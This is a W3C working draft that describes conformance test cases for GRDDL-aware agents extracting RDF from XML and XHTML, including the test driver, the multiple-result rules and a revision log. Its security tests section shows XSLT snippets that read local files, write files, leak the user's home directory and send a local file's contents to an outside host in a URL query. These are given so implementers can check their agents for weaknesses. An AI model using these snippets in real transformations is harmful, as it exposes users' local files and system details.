Copyright © 2006-2007 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply.
This document describes and includes test cases for software agents that extract RDF from XML source documents by following the set of mechanisms outlined in the Gleaning Resource Description from Dialects of Language [GRDDL] specification. They demonstrate the expected behavior of a GRDDL-aware agent by specifying one (or more) RDF graph serializations which are the GRDDL results associated with a single source document.
This section describes the status of this document at the time of its publication. Other documents may supersede this document. A list of current W3C publications and the latest revision of this technical report can be found in the W3C technical reports index at http://www.w3.org/TR/.
This document reconciles tests from other documents in the repository (see Acknowledgements) as well as material from the editor's draft of the primer
This is a Last Call Working Draft of the GRDDL Test Cases. This document was developed by the GRDDL Working Group, which was chartered in July 2006 to review the specification and develop use cases, tutorial materials, and tests.
This May 2nd 2007 release of the GRDDL specification is a Last Call Working Draft by the W3C GRDDL Working Group (part of the Semantic Web Activity) for review by W3C Members and other interested parties. The Working Group seeks confirmation that these test adequately address all comments and that all these tests reflect and clarify all the issues in Gleaning Resource Descriptions from Dialects of Languages (GRDDL). Comments are due by 31 May 2007 to public-grddl-comments@w3.org, a mailing list with public archive). A log of changes is maintained for the convenience of editors and reviewers.
Please send comments about this document to public-grddl-comments@w3.org (with public archive). A log of changes is maintained for the convenience of editors and reviewers.
Publication as a Working Draft does not imply endorsement by the W3C Membership. This is a draft document and may be updated, replaced or obsoleted by other documents at any time. It is inappropriate to cite this document as other than work in progress.
This document was produced by a group operating under the 5 February 2004 W3C Patent Policy. W3C maintains a public list of any patent disclosures made in connection with the deliverables of the group; that page also includes instructions for disclosing a patent. An individual who has actual knowledge of a patent which the individual believes contains Essential Claim(s) must disclose the information in accordance with section 6 of the W3C Patent Policy.
A set of test cases is provided as part of the definition of [GRDDL]. This document presents those test cases. They are intended to provide examples for, and clarification of, the normative behavior of a GRDDL-aware agent. They should be used for testing the conformance of GRDDL-aware agents. The normative tests cover behavior expected of a GRDDL-aware agent. The informative tests demonstrate other permitted behavior with respect to the issues resolved by the Working Group. This document itself has (as a GRDDL result) a manifest describing the test cases in RDF. For convenience, serializations of the GRDDL result are available as RDF/XML and Turtle.
Note: the zip archive does not include tests which require network connectivity in order to properly calculate their GRDDL results.
This test collection uses an RDF vocabulary for manifests developed for the RDF Test Cases Recommendation. A GRDDL-aware agent can extract the test collection and automatically test compliance by attempting to reproduce the expected GRDDL result(s) associated with each test case. Some input documents have multiple output documents, see below
We provide testft.py, a test driver, written in Python and based on rdflib 2.3.3. Run it a la:
$ python testft.py --run your_grddl_impl testlist1.rdf >earl_out.rdf All tests were passed!
It has options for --debug and such; invoke it with no arguments (or with --help) for details:
Options: -r, --run path to a GRDDL implementation to use to process the source document (checking results) -u, --update path to a GRDDL Implementation to use to process the source document --tester The URI of an agent associated with the EARL test assertions. A BNode is used if none is given --project The URI of the EARL 'subject' (the implementation being tested). A BNode is used if none is given --local A boolean flag (false by default) which indicates whether to run only the local tests
The tests do not require the use of this driver
In addition to writing various diagnostic messages to STDERR, the test harness writes additional RDF data to STDOUT: an [EARL] test assertion about each test it runs.
To tell it about the person running the tests and the software project being tested, point it to a tester (a URI in a [FOAF] RDF graph) and a test subject (a URI in a [DOAP] RDF graph).
We find TCPWatch useful for debugging [HTTP] protocol interactions. If you start TCPWatch like so:
$ python tcpwatch.py -p 6543 &
then you can use it as a proxy:
$ http_proxy=http://127.0.0.1:6543 python testft.py --run your_grddl_impl testharness.rdf
A library of standard transforms is available for widespread use by authors
The GRDDL specification states that any transformation identified by an author of a GRDDL source document will provide a Faithful Rendition of the information expressed in the source document. The specification also grants a GRDDL-aware agent the license to makes a determination of whether or not to apply a particular transformation guided by user interaction, a local security policy, or the agent's capabilities. However, in defining these tests it was assumed that the GRDDL-aware agent being tested is using a security policy which does not prevent it from applying transformations identified in each test. Such an agent should produce the GRDDL result associated with each normative test, except as specified immediately below.
Certain tests have multiple GRDDL results as a direct consequence of Faithful Infoset considerations, information resources with multiple representations, and seperate GRDDL mechanisms which produce distinct GRDDL results.
Tests of these kind can be considered as groups of N where N is the number of valid GRDDL results for the common input document.
Testing GRDDL when XInclude processing is enabled and Testing GRDDL when XInclude processing is disabled are examples of tests which share the same source document, but have different XPath data models depending on whether any XInclude processing occurs. For such tests, a GRDDL-aware agent should output at least one of the GRDDL results associated with the single source document.
The tests manifest includes a symmetric property [OWL] (http://www.w3.org/2001/sw/grddl-wg/td/grddl-test-vocabulary#alternative) asserted between them. A GRDDL-aware agent running the tests can take this into consideration.
Information resources can also have multiple representations in response to content negotiation. In addition to the GRDDL results associated with each representation a test for the maximal result is included: the GRDDL result which consists of the merge of all possible GRDDL results.
Note, however, that the maximal result is not isomorphic with the other results. To aid a test harness in determining compliance for scenarios such as these, the tests have a property (http://www.w3.org/2001/sw/grddl-wg/td/grddl-test-vocabulary#subsumes) asserted from the test for the maximal result to the other tests in the group. A GRDDL-aware agent running the tests can take this into consideration.
The remaining set of tests with multiple results are those where there is no ambiguity with the XPath data model associated with the source document, there is a single representation, and multiple GRDDL mechanisms apply. In the absence of a policy which prevents each GRDDL result from being computed, a GRDDL-aware agent should produce the maximal result.
Every test has a URI of the form:
http://www.w3.org/2001/sw/grddl-wg/td/grddl-tests#LOCALNAME
The test collection can either be run locally (see "Localized Tests") or over a network. Certain tests are marked as requiring a network connection with an open circle as their list item marker. These tests are asserted as members of the http://www.w3.org/2001/sw/grddl-wg/td/grddl-test-vocabulary#NetworkedTest class in the test manifest. A GRDDL-aware agent running the tests can take this into consideration.
The tests which require a network connection use absolute URIs (in the test manifest) to refer to their test material (input and output) using the form:
http://www.w3.org/2001/sw/grddl-wg/td/LOCALNAME
Tests which do not require a network connection use relative URIs (in the test manifest) instead.
Each test has an input document and an output document. the output document is an RDF/XML document and represents a GRDDL result of the input document.
For the sake of convenience, this first set of normative tests cover simple scenarios where neither namespace documents nor absolute URIs are used. Such tests can run offline rather easily.
This test case exercises a single GRDDL transformation that is identified using the general XML markup from within the source document.
approval: 2007-04-11
This test case exercises a single GRDDL transformation that is identified using the general XML markup from within a relatively complex source document.
approval: 2007-04-11
This test case exercises a single GRDDL transformation that is identified using XHTML markup within the source document. Note that this test case uses a transformation for RDFa that reflects the status of RDFa markup as of the development of the test case.
Approval: 2007-04-11
This test case uses an inline GRDDL transformation reference (i.e.
within an a
element) instead of one within a
link
element. It also exercises the fact that the
rel
attribute can take multiple space-separated values, and
only one of them needs to be equal to transformation
to
indicate that the resource is in fact a GRDDL transformation.
Approval: 2007-04-11
The base URI for the result document is the URI of the source document.
Approval: 2007-04-11
Approval: 2007-04-18
an XHTML file with the GRDDL profile is interpreted by applying the transformations included in links annotated with rel='transformation'
Approval: 2007-04-18
an XHTML file with the GRDDL profile is interpreted by applying the transformations included in links annotated with rel='transformation', including links in the body of the document
Approval: 2007-04-18
An XHTML file with the GRDDL profile present among other non GRDDL-profiles is interpreted by applying the transformations included in links annotated with rel='transformation'
Approval: 2007-04-25
An XHTML file with the GRDDL profile present is interpreted by applying the transformations included in all the links annotated with rel='transformation' and merging the resulting RDF/XML graphs.
Approval: 2007-04-25
An XML file - in this case, an SVG document - with the GRDDL attribute on the root element; SVG's namespace document is not in an XML format, which makes fail some implementations of GRDDL
Approval: 2007-04-18
These tests include the use of namespace documents and absolute URIs and are more difficult to run offline.
This test case exercises identifying GRDDL transformations using
profileTransformation
assertions. In this case, an XHTML
document notes a profile URI to which it belongs. The profile document,
retrieved from the URI, identifies a GRDDL transformation for the
original document with a profileTransformation
assertion in
its own GRDDL result.
Approval: 2007-04-25
This test case exercises identifying GRDDL transformations using
profileTransformation
assertions from the GRDDL results of
multiple XHTML profile documents.
Approval: 2007-04-25
The namespace document is an RDF document served as mimetype application/xml
Approval: 2007-04-25
This test case exercises identifying GRDDL transformations using
namespaceTransformation
assertions. In this case, an XML
document has a root element with a namespace URI. The namespace
document, retrieved from the URI, is an RDF/XML document (and so
contributes to its own GRDDL results) and identifies a GRDDL
transformation for the original document with a
namespaceTransformation
assertion.
Approval: 2007-04-18
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
This also has an in-body transformation, which has not been added to the root element.
Approval: 2007-04-18
This also has an in-body transformation on the root element.
Approval: 2007-04-25
This also has two in-body transformations on the root element.
Approval: 2007-04-18
Approval: 2007-04-25
An XHTML file with a profile whose interpretation through GRDDL gives a transformation for the said XHTML file.
Approval: 2007-04-25
The following tests are tests primarily of the library code.
a simple test for embedded RDF.
Approval: 2007-04-25
a test for embedded RDF, with two blocks of RDF
Approval: 2007-04-25
a test for embedded RDF. A corner case: an RDF document.
Approval: 2007-04-25
a test for glean profile, checking the treatment of spaces in the rel attribute.
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
This is from the final URI.
Approval: 2007-04-25
This is from a redirected URI.
Approval: 2007-04-25
This shows intended use of the profile.
Approval: 2007-04-25
These tests help check for robustness of implementations in the face of various odd cases.
Approval: 2007-04-25
In this test case, the input file uses XInclude to include xinclude2.xml, and that the output has only one triple unless the XML Processor of the GRDDL implementation implements XInclude. The output for this case assumes that the processor does resolve XIncludes.
Approval: 2007-04-11
This test case is an alternative to the XInclude enabled test case. The output for this case assumes that the processor does not resolve XIncludes, which may lead to a different GRDDL result.
Approval: 2007-04-11
Note that the input is an RDF document with a GRDDL transformation, and that according to the rules given by the GRDDL Specification, there are three distinct and equally valid output graphs for this test for this document. This output is a graph that is merge of the graph given by the source document with the graph given by the result of the GRDDL transformation.
Approval: 2007-04-25
The rel attribute can take multiple values.
Approval: 2007-04-25
The layering tests, permit arbitrary nesting (up to depth 9) of HTML profiles and XML namespaces. The general pattern is:
$V
matching ((ns|pf)-){0-8}
.
ns-$Vfnd
is an xml document
with namespace $Vfnd
.
pf-$Vfnd
is an xhtml document
with profile $Vfnd
.
fnd
specifies appropriate transformations,
so that every possible stack have GRDDL results.
These are all different.
fnd-$Voutput.srdf
is the correct answer.
An HTML document which has a profile being an HTML document, which has a profile being an HTML document, which has a profile being an XML document, which has an RDF namespace document.
Approval: 2007-04-18
An XML document which has an XML namespace document, which has an HTML namespace document, which has a profile being an HTML document, which has a profile being an RDF document./
Approval: 2007-04-18
An XML document which has an HTML namespace document, which has a profile being an XML document, which has an HTML namespace document, which has a profile being an XML document, which has an RDF namespace document.
Approval: 2007-04-18
The following four tests demonstrate GRDDL results for a self-referencing input document. Unlike other tests of this kind, the last of these - the maximal result - is not exlusive. This reflects an interpretation of SHOULD as used in section 7. GRDDL-Aware Agents of [GRDDL] with regards to the computation of GRDDL results. In particular, this interpretation and the text in the section that follows (8. Security considerations) permits an implementation to only pass the first test due to security restrictions against computing recursive GRDDL results.
For this particular test, an XML document
is its own namespace document,
with a GRDDL transformation, specifying
a namespaceTransformation
, which specifies
a further namespaceTransformation
.
This result is the first possible GRDDL result.
Implementations that make no allowance
for such cases may produce
this result.
Documents authors are advised against having
information resources whose GRDDL results depend
on other GRDDL results for the same resource.
Approval: 2007-04-25
An XML document
is its own namespace document,
with grddl transformation, specifying
a namespaceTransformation
, which specifies
a further namespaceTransformation
.
This result is the merge of the
first two possible GRDDL results.
Implementations that make no special allowance
for or prohibition of
such cases may produce
this result. Documents authors are advised against having
information resources whose GRDDL results depend
on other GRDDL results for the same resource.
Approval: 2007-04-25
An XML document
is its own namespace document,
with grddl transformation, specifying
a namespaceTransformation
, which specifies
a further namespaceTransformation
.
This result is the merge of the
first three possible GRDDL results.
Implementations that make no special allowance
for
or prohibition of
such cases may produce
this result.
Documents authors are advised against having
information resources whose GRDDL results depend
on other GRDDL results for the same resource.
Approval: 2007-04-25
An XML document
is its own namespace document,
with a GRDDL transformation, specifying
a namespaceTransformation
, which specifies
a further namespaceTransformation
.
This result is the merge of all possible GRDDL results.
Documents authors are advised against having
information resources whose GRDDL results depend
on other GRDDL results for the same resource.
Approval: 2007-04-25
Two transforms apply to this document, following rules in both sections 2 and 4 of the specification.
Approval: 2007-04-25
An XHTML file with a profile whose interpretation through GRDDL gives a transformation for the said XHTML file; the document also specifies the GRDDL profile, and a transformation.
Approval: 2007-04-25
An XHTML file with a profile whose interpretation through GRDDL gives a transformation for the said XHTML file; the document also specifies a transformation, but omits to specify the GRDDL profile.
Approval: 2007-04-25
This test differs from the previous example of applying GRDDL to an RDF/XML document in that the RDF file is served (not best practice, but rather common) as media-type "application/xml". The output is a graph that is merge of the graph given by the source document with the graph given by the result of the GRDDL transformation.
Approval: 2007-04-18
This test exists to bring attention to developers to issues of content negotiation, in particular, content negotiation over language as described and implemented by W3C QA. There are two valid resulting GRDDL results of running this GRDDL transformation depending on what language the GRDDL-aware agent uses, and an implementation of a GRDDL-aware agent only needs to retrieve the one that is appropriate for its HTTP header request. This result follows from retrieving a English version of the HTML representation and thus having the GRDDL result produce a result with English-language content.
Approval: 2007-04-25
This result follows from retrieving a German version of the HTML representation and thus having the GRDDL result produce a result with German-language content.
Approval: 2007-04-25
A GRDDL aware agent may retrieve both representations, for example, by using transparent content negotiation. This GRDDL result is the merge of the previous two.
Approval: 2007-04-25
This test gives the GRDDL result of the HTML representation.
Approval: 2007-04-25
This test gives the GRDDL result of the SVG representation.
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
This test case exercises resolution of relative references found in the GRDDL results for a general XML document. In this case, according to RFC 3986, section 5.1, a base URI for the relative reference is recursively discovered on the encapsulating entity for the GRDDL results, which is the root element of the input document, in order to maintain fidelity to the faithful rendition requirement. The root element assigns the base URI using the mechanism described in XML Base.
Approval: 2007-04-27
This test case exercises resolution of relative references found in the GRDDL results for a general XML document. In this case, according to RFC 3986, section 5.1, a base URI for the relative reference is recursively discovered to be the URI used to retrieve the input document, since no base URI is assigned in the content of the encapsulating entity (that is, the root element of the input document).
Approval: 2007-04-27
This test case exercises resolution of relative references found in the GRDDL results for a general XML document when that document is resolved through a protocol redirection mechanism. The base URI for these relative references is established by the xml:base attribute on the root element, as for "An xml document with an xml:base attribute".
Approval: 2007-04-27
This test case exercises resolution of relative references found in the GRDDL results for a general XML document when that document is resolved through a protocol redirection mechanism. The base URI of the document is the target URI of the last redirection step; after establishing this fact, this test case follows the same behavior as "A similar xml document without an xml:base attribute".
Approval: 2007-04-27
This section includes material from the [Primer].
This test demonstrate the ability to use GRDDL to transform from HL7 CDA to a medical record ontology. Derived from usecase and primer material
Approval: 2007-04-18
This section includes tests not covered explicitely by the normative text of the GRDDL but demonstrate additional behavior that a GRDDL-aware agent may exhibit. They reflect behavior suggested by the Working Group as a result of resolving certain issues.
This test demonstrates an informative resolution to the issue-output-formats issue with an XSLT GRDDL transformation which outputs a [TURTLE] RDF graph serialization associated with an appropriate media-type (text/rdf+n3) via XSLT's output element.
approval: 11 April telecon
an XSL transform may have output in an unknown media type.
In this test, it is assumed that the GRDDL aware agent being
tested does not know how to parse
x-no-such-type/x-no-such-subtype
documents.
Approval: 2007-04-18
The following security tests are provided for implementers to adapt and use for their implementation. Security issues are usually system specific, and it may be possible for a malicious party to access XSLT version and vendor information concerning a specific GRDDL agent instance.
We do not provide instructions as to how to test your system against these tests, since they are likely to be not directly applicable. Developers of GRDDL aware agents are encouraged to understand these tests, and consider how their own systems may have potential security weaknesses.
document('file:///temp/local.txt')
.
document('http://www.w3.org/')
.
<xsl:result-document href="file:///temp/a.txt">
.
<xsl:value-of select="document( concat( 'http://www.w3.org/?',
encode-for-uri(
unparsed-text('file:///temp/local.txt') ) ) )" />
rdf:resource="security6.sxsl?{system-property('user.home')}"
.
This uses a Saxon extension to the XSLT system-property
function.
The editor thankfully acknowledges the contributions of the following Working Group members and personel:
The security tests were created during the development of the Jena GRDDL Reader which uses the Saxon8.8 XSLT processor. They hence illustrate how a malicious party may try to abuse features of such an implementation.
Changes since the Working Groups decision to publish on 7 March:
$Log: Overview.html,v $ Revision 1.5 2018/10/09 13:17:29 denis fix validation of xhtml documents Revision 1.4 2017/10/02 10:34:38 denis add fixup.js to old specs Revision 1.3 2007/05/03 16:59:38 jean-gui fixing links Revision 1.42 2007/05/03 16:47:55 cogbuji fixed #changelog anchor Revision 1.41 2007/05/03 16:40:34 cogbuji fixed anchor links to GRDDL reference Revision 1.40 2007/05/03 16:35:10 cogbuji fixed more broken links Revision 1.39 2007/05/03 14:49:25 cogbuji fixed broken links Revision 1.38 2007/04/30 15:56:16 cogbuji changed per thread on #xmlbase3. See: http://lists.w3.org/Archives/Public/public-grddl-wg/2007Apr/0266.html Revision 1.37 2007/04/30 15:42:38 cogbuji removed base-detail. See: http://lists.w3.org/Archives/Public/public-grddl-wg/2007Apr/0264.html Revision 1.36 2007/04/28 05:24:57 cogbuji removed bad css color Revision 1.35 2007/04/28 04:57:03 cogbuji fixed date Revision 1.32 2007/04/28 04:43:26 cogbuji fixed pubrules violations and merged conflicts Revision 1.31 2007/04/27 22:36:20 hhalpin updated status text, removed embeddedrdf-4 approval Revision 1.30 2007/04/27 20:07:33 cogbuji added text for xmlbase1-4 Revision 1.29 2007/04/27 19:12:44 cogbuji fixed correct output for xmlbase2 and xmlbase4 Revision 1.28 2007/04/27 15:22:20 cogbuji fixed output files for xmlbase1-4 tests Revision 1.27 2007/04/27 15:01:34 cogbuji - changed all test input/output to absolute URIs - updated approval indications - removed tests per WG decision (httpHeaders and primer-hotel-data) - added base-detail Revision 1.26 2007/04/25 14:20:41 cogbuji well-formedness-fixes Revision 1.25 2007/04/25 05:59:18 cogbuji removed obsolete todos Revision 1.24 2007/04/25 05:50:38 cogbuji added ack for Dom.. Revision 1.23 2007/04/25 03:39:25 cogbuji fixed CSS class for network test (requires .htaccess magic) Revision 1.22 2007/04/25 02:48:29 cogbuji fixed double ref-WEBARCH, removed incorrect approval citation, fixed test li id syntax, added networked tests Revision 1.21 2007/04/23 16:57:46 cogbuji - moved in fixed versions of missing tests - removed use of 'will' Revision 1.20 2007/04/23 16:23:34 cogbuji - added text to tests (from john-l suggestions) - synched in commentary from jeremy - added missing tests - moved in additional tests from the pending list - updated approved tests Revision 1.19 2007/04/16 20:03:31 cogbuji - updated multiple output section to clarify the 3 kinds of multiple output scenarios - removed background color for approved test links - added approval links for tests approved during 4/11 teleconference - Collapsed single infoset / representation multiple output tests into maximal result Revision 1.18 2007/04/09 22:09:03 cogbuji - added CSS hooks for maximal result tests - added security tests section - clarifications to multiple output section - removed three-transforms Revision 1.17 2007/04/08 05:23:37 cogbuji - Minor editorial fixes - added note about Primer editorial draft material - moved library tests to normative section - added primer material test section - updated documentation for testft.py (--local option) - fixed links to GRDDL spec LC draft - shrunk multiple output diagram and floated left - removed uneccessary 'should's - fixed input link to loop instead of loop.xml (see result) - added primer material section - informative link to primer Revision 1.16 2007/04/06 20:32:42 cogbuji xhtmlWithGrddlEnabledProfile properly marked as a NetworkedTest (and movd appropriately) Revision 1.15 2007/04/06 19:29:27 cogbuji Fixed erroneous text about (and proper generation of) g:alternative and added further text using an explicit example to demonstrate multiple outputs and their effect on compliance. Revision 1.14 2007/04/06 18:11:40 cogbuji Fixes towards WG actions: - migrated all remaining tests from testlist* and pendinglist - added CSS styling for test approval and network tests - moved hcarda (networked test) - removed WD indications - added text for naming conventions and use of NetworkedTest and alternative in test manifest Revision 1.13 2007/04/05 04:42:48 cogbuji Moved in most of remaining tests from repository. Added editorial todos / notes. Added clear indication that this is an editors draft. Revision 1.12 2007/04/04 15:50:36 cogbuji removed indication of WD (commented styling to that effect) Revision 1.11 2007/03/27 23:28:43 cogbuji fixed patent policy link Revision 1.10 2007/03/24 19:25:06 cogbuji more pubrules fixes: ids for references headings, fixed cascade of css Revision 1.9 2007/03/24 05:48:34 cogbuji removed recursive log directive Revision 1.8 2007/03/24 05:45:47 cogbuji fixed change log link and added retrospective change log entries Revision 1.7 2007/03/24 05:42:42 cogbuji fixed changelog entries Revision 1.6 2007/03/24 05:09:36 cogbuji; fixed broken links to manifest files Revision 1.5 2007/03/24 04:59:19 cogbuji added SOTD and fixed css for WD (per pubrules) Revision 1.4 2007/03/24 04:39:30 cogbuji various XHTML validity modifications, synched up with deprecated doc50/grddl-tests.html (which was subject of WG approval), and other pre-transtion pubrules checks